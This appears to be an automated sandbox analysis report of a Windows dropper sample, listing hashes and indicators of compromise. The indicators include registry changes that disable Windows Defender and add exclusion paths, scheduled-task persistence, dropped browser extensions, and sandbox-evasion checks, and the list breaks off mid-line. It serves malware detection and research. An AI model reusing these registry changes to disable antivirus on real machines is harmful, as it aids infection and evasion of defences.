Analysis
-
max time kernel
241s -
max time network
242s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
28/03/2024, 22:28
Static task
static1
Behavioral task
behavioral1
Sample
509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe
Resource
win7-20240221-en
General
-
Target
509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe
-
Size
7.5MB
-
MD5
881037c3e333268c36bbb87aba7fbeba
-
SHA1
448f9198f3fac3a0c038bed8a02a0b78cde2cfb1
-
SHA256
509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80
-
SHA512
0c79e6a612ba5959d3d73e7cb34f221fe20eabb680aa7b523d1237e5652edad7b10e2432d8195aa0f4758a59d9ca827ac2be2f7e5b74e794dfe87edef982d1db
-
SSDEEP
196608:91O8er2zLmXh5u01Q9xqZHczyUe2bEKQNRPY+i:3O8ekiRo01T2+MKzPYv
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\iyzAqDqghgpU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UotyJsAgSFUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\dTRdFhcsEOtGTQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\iyzAqDqghgpU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dYCYYvmNvBRqgTGOH = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gtigoJAOxebpSqst = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KuTytnbkU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gtigoJAOxebpSqst = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gtigoJAOxebpSqst = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JqMoIWPtRqoDC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KuTytnbkU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gtigoJAOxebpSqst = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\dTRdFhcsEOtGTQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JqMoIWPtRqoDC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\UotyJsAgSFUn = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 1824 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Control Panel\International\Geo\Nation jVZhyNO.exe -
Executes dropped EXE 4 IoCs
pid Process 2368 Install.exe 1112 Install.exe 980 hzbTtSU.exe 2664 jVZhyNO.exe -
Loads dropped DLL 12 IoCs
pid Process 1808 509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe 2368 Install.exe 2368 Install.exe 2368 Install.exe 2368 Install.exe 1112 Install.exe 1112 Install.exe 1112 Install.exe 1824 rundll32.exe 1824 rundll32.exe 1824 rundll32.exe 1824 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json jVZhyNO.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json jVZhyNO.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 jVZhyNO.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol hzbTtSU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat jVZhyNO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 jVZhyNO.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini hzbTtSU.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E jVZhyNO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 jVZhyNO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jVZhyNO.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol jVZhyNO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jVZhyNO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 jVZhyNO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E jVZhyNO.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hzbTtSU.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jVZhyNO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jVZhyNO.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\KuTytnbkU\nkFeSs.dll jVZhyNO.exe File created C:\Program Files (x86)\JqMoIWPtRqoDC\BrFiQZk.xml jVZhyNO.exe File created C:\Program Files (x86)\KuTytnbkU\UxCngSm.xml jVZhyNO.exe File created C:\Program Files (x86)\iyzAqDqghgpU2\KaaRexl.xml jVZhyNO.exe File created C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\mxkomea.dll jVZhyNO.exe File created C:\Program Files (x86)\PSjUbWBFcPUKufSEFkR\jkuntBv.xml jVZhyNO.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi jVZhyNO.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja jVZhyNO.exe File created C:\Program Files (x86)\UotyJsAgSFUn\SdNCPFL.dll jVZhyNO.exe File created C:\Program Files (x86)\iyzAqDqghgpU2\hnGkRFFeHSpsN.dll jVZhyNO.exe File created C:\Program Files (x86)\JqMoIWPtRqoDC\dqJJNZy.dll jVZhyNO.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi jVZhyNO.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak jVZhyNO.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\btbwILgIDOMomJfKYB.job schtasks.exe File created C:\Windows\Tasks\tbikxcbubRAutxvXV.job schtasks.exe File created C:\Windows\Tasks\BDcYZHwUBrpBRcy.job schtasks.exe File created C:\Windows\Tasks\uWHYFRHVxuNygqWgi.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2628 schtasks.exe 2428 schtasks.exe 612 schtasks.exe 2240 schtasks.exe 1152 schtasks.exe 1240 schtasks.exe 2632 schtasks.exe 1588 schtasks.exe 808 schtasks.exe 2192 schtasks.exe 804 schtasks.exe 1940 schtasks.exe 1540 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFB57058-C07B-4CFF-A322-7CC127FBF1CD}\3e-9e-10-c9-cd-06 jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs jVZhyNO.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" jVZhyNO.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFB57058-C07B-4CFF-A322-7CC127FBF1CD}\WpadDecision = "0" jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-9e-10-c9-cd-06 jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed jVZhyNO.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 jVZhyNO.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00f4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFB57058-C07B-4CFF-A322-7CC127FBF1CD}\3e-9e-10-c9-cd-06 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFB57058-C07B-4CFF-A322-7CC127FBF1CD} jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs jVZhyNO.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CFB57058-C07B-4CFF-A322-7CC127FBF1CD}\WpadNetworkName = "Network 3" jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-9e-10-c9-cd-06 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix jVZhyNO.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-9e-10-c9-cd-06\WpadDecisionReason = "1" jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA jVZhyNO.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-9e-10-c9-cd-06\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" jVZhyNO.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-9e-10-c9-cd-06\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs jVZhyNO.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad jVZhyNO.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-9e-10-c9-cd-06\WpadDecisionTime = 70023c995f81da01 jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs jVZhyNO.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates jVZhyNO.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-9e-10-c9-cd-06\WpadDecision = "0" jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00f4000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\3e-9e-10-c9-cd-06\WpadDecisionTime = 70023c995f81da01 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 jVZhyNO.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA jVZhyNO.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 1712 powershell.EXE 1712 powershell.EXE 1712 powershell.EXE 3064 powershell.EXE 3064 powershell.EXE 3064 powershell.EXE 888 powershell.EXE 888 powershell.EXE 888 powershell.EXE 2256 powershell.EXE 2256 powershell.EXE 2256 powershell.EXE 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe 2664 jVZhyNO.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1712 powershell.EXE Token: SeDebugPrivilege 3064 powershell.EXE Token: SeDebugPrivilege 888 powershell.EXE Token: SeDebugPrivilege 2256 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1808 wrote to memory of 2368 1808 509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe 28 PID 1808 wrote to memory of 2368 1808 509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe 28 PID 1808 wrote to memory of 2368 1808 509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe 28 PID 1808 wrote to memory of 2368 1808 509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe 28 PID 1808 wrote to memory of 2368 1808 509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe 28 PID 1808 wrote to memory of 2368 1808 509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe 28 PID 1808 wrote to memory of 2368 1808 509ff0ea8d942b38a71f14e484ce09ee136d6a4b76c606e5c2056bd1c0a83b80.exe 28 PID 2368 wrote to memory of 1112 2368 Install.exe 29 PID 2368 wrote to memory of 1112 2368 Install.exe 29 PID 2368 wrote to memory of 1112 2368 Install.exe 29 PID 2368 wrote to memory of 1112 2368 Install.exe 29 PID 2368 wrote to memory of 1112 2368 Install.exe 29 PID 2368 wrote to memory of 1112 2368 Install.exe 29 PID 2368 wrote to memory of 1112 2368 Install.exe 29 PID 1112 wrote to memory of 2156 1112 Install.exe 31 PID 1112 wrote to memory of 2156 1112 Install.exe 31 PID 1112 wrote to memory of 2156 1112 Install.exe 31 PID 1112 wrote to memory of 2156 1112 Install.exe 31 PID 1112 wrote to memory of 2156 1112 Install.exe 31 PID 1112 wrote to memory of 2156 1112 Install.exe 31 PID 1112 wrote to memory of 2156 1112 Install.exe 31 PID 1112 wrote to memory of 2712 1112 Install.exe 33 PID 1112 wrote to memory of 2712 1112 Install.exe 33 PID 1112 wrote to memory of 2712 1112 Install.exe 33 PID 1112 wrote to memory of 2712 1112 Install.exe 33 PID 1112 wrote to memory of 2712 1112 Install.exe 33 PID 1112 wrote to memory of 2712 1112 Install.exe 33 PID 1112 wrote to memory of 2712 1112 Install.exe 33 PID 2156 wrote to memory of 2752 2156 forfiles.exe 35 PID 2156 wrote to memory of 2752 2156 forfiles.exe 35 PID 2156 wrote to memory of 2752 2156 forfiles.exe 35 PID 2156 wrote to memory of 2752 2156 forfiles.exe 35 PID 2156 wrote to memory of 2752 2156 forfiles.exe 35 PID 2156 wrote to memory of 2752 2156 forfiles.exe 35 PID 2156 wrote to memory of 2752 2156 forfiles.exe 35 PID 2712 wrote to memory of 2724 2712 forfiles.exe 36 PID 2712 wrote to memory of 2724 2712 forfiles.exe 36 PID 2712 wrote to memory of 2724 2712 forfiles.exe 36 PID 2712 wrote to memory of 2724 2712 forfiles.exe 36 PID 2712 wrote to memory of 2724 2712 forfiles.exe 36 PID 2712 wrote to memory of 2724 2712 forfiles.exe 36 PID 2712 wrote to memory of 2724 2712 forfiles.exe 36 PID 2752 wrote to memory of 2880 2752 